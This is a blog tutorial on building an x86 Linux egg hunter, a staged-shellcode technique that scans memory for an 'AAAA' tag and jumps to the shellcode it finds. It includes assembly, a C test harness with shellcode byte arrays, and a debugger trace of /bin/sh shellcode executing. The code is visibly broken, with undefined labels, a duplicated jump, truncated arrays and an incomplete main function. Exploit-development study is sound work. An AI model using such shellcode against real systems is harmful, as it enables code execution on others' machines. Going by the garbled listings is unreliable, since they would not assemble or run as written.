x86 Linux Egg hunter

This is a small post regarding egg hunting on x86 Linux systems. I’d highly recommend you to read skape’s paper “Safely Searching Process Virtual Address Space” . He has described his techniques for Linux and Windows systems. I will be using one of his implementations.  I will use the access system call which is 33 for IA-32.

#define __NR_access              33

The access system call can be used the check whether the calling process can access the file.

#include <unistd.h>
int access(const char *pathname, int mode);

This is the x86 assembly implementation of the hunger code. It will search the virtual address space for our tag “AAAA” and begin execution of our shellcode. I am not going to explain this implementation. You can refer to skape’s document in higher detail.

; linux x86 Egg Hunter using access (35 bytes)
; Egg size: 8 bytes

global _start

        section .text

        xor edx, edx

        or dx, 0xfff

        inc edx
        lea ebx, [edx+0x4]
        push byte 0x21
        pop eax
        int 0x80

        cmp al, 0xf2        ; check for EFAULT
        je npage            ; if yes, keep searching
        mov eax, 0x41414141 ; Our tag
        mov edi, edx
        jne naddr
        jne naddr
        jmp edi

To test this I’ll use “/bin/sh” shellcode inside my skeleton test file. I have defined the egg as “AAAA”. You can write anything accept null characters.


#define EGG "\x41\x41\x41\x41"

unsigned char shellcode[] = EGG

unsigned char egghunter[] = "\x31\xd2\x66\x81\xca\xff\x0f\x42"
main() {
    printf("Shellcode Length: %d\n", strlen(egghunter));
    int (*ret)() = (int(*)())egghunter;

Once you compile it run it you should get your shellcode working 🙂
If we analyze this we can see how the searching is done. Whenever an invalid address is found the EFAULT is return in EAX as “0xFFFFFFF2” the lower bytes are compared “f2” and if the zero flag is set, go to the next page and it keeps on finding.

View post on imgur.com

Once it finds the tag our our real shellcode will start to run.

EAX: 0x41414141 EBX: 0x0804A044 ECX: 0x00000000 EDX: 0x0804A040 o d I t s Z a P c
ESI: 0x00000000 EDI: 0x0804A048 EBP: 0xBFFFF678 ESP: 0xBFFFF63C EIP: 0x0804A048
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
=> 0x804a048 : xor eax,eax
0x804a04a : push eax
0x804a04b : push 0x68732f2f
0x804a050 : push 0x6e69622f
0x804a055 : mov ebx,esp
0x804a057 : push eax
0x804a058 : mov edx,esp
0x804a05a : push ebx

View post on imgur.com

In this manner you can write 2 staged shellcode.

One thought on “x86 Linux Egg hunter

Leave a Reply